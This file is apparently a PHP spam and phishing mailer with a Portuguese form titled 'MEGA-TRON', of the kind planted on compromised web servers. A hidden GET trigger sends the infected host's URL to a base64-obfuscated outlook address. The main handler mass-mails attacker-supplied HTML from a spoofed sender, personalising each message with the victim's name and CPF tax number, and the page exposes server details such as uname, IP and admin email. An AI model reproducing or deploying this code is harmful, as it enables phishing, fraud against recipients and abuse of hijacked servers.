if(isset($_GET['testa'])){
$email = base64_decode('YWRhb2Nvc3RhMzlqcnBhZWtAb3V0bG9vay5jb20=');
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
$envio = mail("$email","[v] http://$target","http://$target");
if($envio) { echo '<span style="font-family: monospace;">[+] FOI</span>
'; }
else { echo '<span style="font-family: monospace;">[-] N?</span>
'; }
}
$testa = $_POST['veio'];
if($testa != "") {
$message = $_POST['html'];
$subject = $_POST['assunto'];
//$nome = $_POST['nome'];
$de = $_POST['de'];
$to = $_POST['emails'];
$host = "<font color='#FFFFFF'>".$_SERVER["HTTP_HOST"]." </font>";
$email = explode("\n", $to);
$message = stripslashes($message);

$i = 0;
$count = 1;
while($email[$i]) {
$aux = explode(';',$email[$i]);
$dataHora = date("d/m/Y h:i:s");
$boundary = rand(0,999999999999);
$codig = " - ( $boundary\n )";

$EmailTemporario = $aux[0];
$message = stripslashes($message);


$rnd = rand(10000000, 99999999);
$msgy = str_replace("%email%", $EmailTemporario, $message);
$msgx = str_replace("%rand%", $rnd, $msgy);
$msgz = str_replace("%nome%", $aux[1], $msgx);
$msga = str_replace("%cpf%", $aux[2], $msgz);
$msgb = str_replace("%nome%", $aux[1], $subject);
$de = str_replace("%rand%", $rnd, $de);

$headers = "MIME-Version: 1.0\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\n";
$headers .= "From: ".$nome." <".$de.">\r\n";

if(mail($EmailTemporario, $msgb.$codig, $msga.$dataHora, $headers))
echo '<font color=blue>( $count ) <font color=black>transformou '.($i+1).' </font><email>'.$email[$i].'</email>
<hr>';
else
echo '<font color=black>( $count ) <font color=red>nao vem info '.($i+1).' </font><email>'.$email[$i].'</email>
<hr>';
$i++;
$count++;
}
$count--;
echo "[Fim do Envio]";
if($ok == "ok")
echo "[Fim do Envio]";
}




<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
corp.Mega<title>corp.Mega</title>



<p>
<span style="text-align: center; font-size: 14px; color: #000; font-weight: bold; font-style: italic;">


</span>
</p>
<table width="720" height="496" border="0">

<p style="text-align: center; font-size: 36px; color: #009; font-weight: bold; font-style: italic;">MEGA-TRON</p>
<p style="text-align: center; font-size: 14px; color: #000; font-weight: bold; font-style: italic;">Assunto:

</p>
<p style="text-align: center; font-size: 14px; color: #000; font-weight: bold; font-style: italic;">Remetente:

</p>
<p style="text-align: center; font-size: 14px; color: #000; font-weight: bold; font-style: italic;">HTML:
<textarea name="html" style="width:40%" rows="8" wrap="virtual" class="normal" id="html" cols="1"></textarea>
*.*Lista
<textarea name="emails" style="width:40%" rows="8" wrap="virtual" class="normal" id="emails" cols="1">
</textarea>
</p>
<p style="text-align: center; font-size: 14px; color: #000; font-weight: bold; font-style: italic;">

</p>
<p style="text-align: center; font-size: 14px; color: #000; font-weight: bold; font-style: italic;">&nbsp;</p>
<p style="text-align: center; font-size: 14px; color: #000; font-weight: bold; font-style: italic;">&nbsp;</p>
<p style="text-align: left; font-size: 14px; color: #000; font-weight: bold; font-style: italic;">Nome do Servidor: echo $UNAME = @Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64; <br />
IP: echo $_SERVER['SERVER_ADDR']; <br />
Email admin: echo $_SERVER['SERVER_ADMIN'];

Sistema Operacional: echo $OS = @PHP_OS; </p>